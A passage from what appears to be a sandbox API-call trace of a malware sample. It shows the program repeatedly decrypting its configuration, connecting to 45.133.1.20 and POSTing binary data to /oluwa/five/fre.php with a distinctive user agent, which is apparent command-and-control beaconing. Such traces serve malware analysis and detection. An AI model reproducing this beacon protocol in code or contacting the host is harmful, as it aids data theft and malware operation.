(HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0247.784] socket (af=2, type=1, protocol=6) returned 0x814 [0247.785] connect (s=0x814, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0247.813] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0247.813] GetProcessHeap () returned 0x6a0000 [0247.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0247.813] GetProcessHeap () returned 0x6a0000 [0247.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0247.814] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0247.815] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.815] GetProcessHeap () returned 0x6a0000 [0247.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4af8 [0247.815] GetProcessHeap () returned 0x6a0000 [0247.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0247.816] GetProcessHeap () returned 0x6a0000 [0247.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0247.816] GetProcessHeap () returned 0x6a0000 [0247.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0247.817] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0247.818] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.818] GetProcessHeap () returned 0x6a0000 [0247.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0247.818] GetProcessHeap () returned 0x6a0000 [0247.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0247.819] send (s=0x814, buf=0x6bd460*, len=242, flags=0) returned 242 [0247.819] send (s=0x814, buf=0x6bb998*, len=159, flags=0) returned 159 [0247.820] GetProcessHeap () returned 0x6a0000 [0247.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0247.820] recv (in: s=0x814, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0247.891] GetProcessHeap () returned 0x6a0000 [0247.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0247.892] GetProcessHeap () returned 0x6a0000 [0247.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0247.894] GetProcessHeap () returned 0x6a0000 [0247.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4af8 | out: hHeap=0x6a0000) returned 1 [0247.894] GetProcessHeap () returned 0x6a0000 [0247.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0247.895] closesocket (s=0x814) returned 0 [0247.895] GetProcessHeap () returned 0x6a0000 [0247.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0247.895] GetProcessHeap () returned 0x6a0000 [0247.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0247.896] GetProcessHeap () returned 0x6a0000 [0247.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0247.896] GetProcessHeap () returned 0x6a0000 [0247.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0247.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1544) returned 0x814 [0247.899] Sleep (dwMilliseconds=0xea60) [0247.900] GetProcessHeap () returned 0x6a0000 [0247.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0247.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.969] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0247.987] GetProcessHeap () returned 0x6a0000 [0247.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0247.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.992] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0247.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.993] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.995] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.995] GetProcessHeap () returned 0x6a0000 [0247.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0247.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.999] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0248.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.001] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0248.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.002] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0248.002] GetProcessHeap () returned 0x6a0000 [0248.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0248.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.003] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.005] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.006] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.009] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.010] GetProcessHeap () returned 0x6a0000 [0248.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0248.010] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.010] GetProcessHeap () returned 0x6a0000 [0248.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0248.011] GetProcessHeap () returned 0x6a0000 [0248.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0248.011] GetProcessHeap () returned 0x6a0000 [0248.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0248.011] GetProcessHeap () returned 0x6a0000 [0248.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0248.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.019] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0248.026] GetProcessHeap () returned 0x6a0000 [0248.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0248.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.027] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0248.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.028] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.029] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.029] GetProcessHeap () returned 0x6a0000 [0248.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0248.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.032] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0248.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.033] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0248.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.034] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0248.034] GetProcessHeap () returned 0x6a0000 [0248.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0248.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.035] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0248.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.036] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0248.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.037] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0248.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.038] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0248.038] GetProcessHeap () returned 0x6a0000 [0248.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0248.038] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0248.038] GetProcessHeap () returned 0x6a0000 [0248.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0248.038] socket (af=2, type=1, protocol=6) returned 0x818 [0248.039] connect (s=0x818, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0248.069] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0248.069] GetProcessHeap () returned 0x6a0000 [0248.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0248.069] GetProcessHeap () returned 0x6a0000 [0248.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0248.070] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0248.071] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.071] GetProcessHeap () returned 0x6a0000 [0248.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c54b8 [0248.071] GetProcessHeap () returned 0x6a0000 [0248.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0248.071] GetProcessHeap () returned 0x6a0000 [0248.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0248.071] GetProcessHeap () returned 0x6a0000 [0248.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0248.072] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0248.073] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.073] GetProcessHeap () returned 0x6a0000 [0248.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0248.073] GetProcessHeap () returned 0x6a0000 [0248.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0248.074] send (s=0x818, buf=0x6bd460*, len=242, flags=0) returned 242 [0248.075] send (s=0x818, buf=0x6bb998*, len=159, flags=0) returned 159 [0248.075] GetProcessHeap () returned 0x6a0000 [0248.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0248.075] recv (in: s=0x818, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0248.289] GetProcessHeap () returned 0x6a0000 [0248.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0248.290] GetProcessHeap () returned 0x6a0000 [0248.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0248.290] GetProcessHeap () returned 0x6a0000 [0248.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c54b8 | out: hHeap=0x6a0000) returned 1 [0248.291] GetProcessHeap () returned 0x6a0000 [0248.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0248.291] closesocket (s=0x818) returned 0 [0248.295] GetProcessHeap () returned 0x6a0000 [0248.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0248.295] GetProcessHeap () returned 0x6a0000 [0248.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0248.296] GetProcessHeap () returned 0x6a0000 [0248.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0248.296] GetProcessHeap () returned 0x6a0000 [0248.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0248.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1548) returned 0x818 [0248.354] Sleep (dwMilliseconds=0xea60) [0248.355] GetProcessHeap () returned 0x6a0000 [0248.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0248.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.359] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.410] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0248.422] GetProcessHeap () returned 0x6a0000 [0248.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0248.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.423] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0248.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.491] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.493] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.493] GetProcessHeap () returned 0x6a0000 [0248.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0248.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.494] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0248.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.496] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0248.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.497] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0248.497] GetProcessHeap () returned 0x6a0000 [0248.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0248.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.498] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.501] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.503] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.504] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.504] GetProcessHeap () returned 0x6a0000 [0248.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0248.504] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.505] GetProcessHeap () returned 0x6a0000 [0248.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0248.505] GetProcessHeap () returned 0x6a0000 [0248.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0248.506] GetProcessHeap () returned 0x6a0000 [0248.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0248.506] GetProcessHeap () returned 0x6a0000 [0248.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0248.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.508] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.515] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0248.525] GetProcessHeap () returned 0x6a0000 [0248.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0248.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.526] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0248.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.527] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.529] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.529] GetProcessHeap () returned 0x6a0000 [0248.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0248.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.531] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0248.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.532] CryptDestroyKey (hKey=0x6ad020) returned 1 [0248.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.535] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0248.535] GetProcessHeap () returned 0x6a0000 [0248.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0248.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.536] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0248.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.538] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0248.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.539] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0248.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.540] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0248.540] GetProcessHeap () returned 0x6a0000 [0248.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0248.540] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0248.540] GetProcessHeap () returned 0x6a0000 [0248.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0248.540] socket (af=2, type=1, protocol=6) returned 0x81c [0248.541] connect (s=0x81c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0248.572] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0248.572] GetProcessHeap () returned 0x6a0000 [0248.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0248.572] GetProcessHeap () returned 0x6a0000 [0248.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0248.574] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0248.576] wvsprintfA (in: param_1=0x6dbf30, param_2="POST 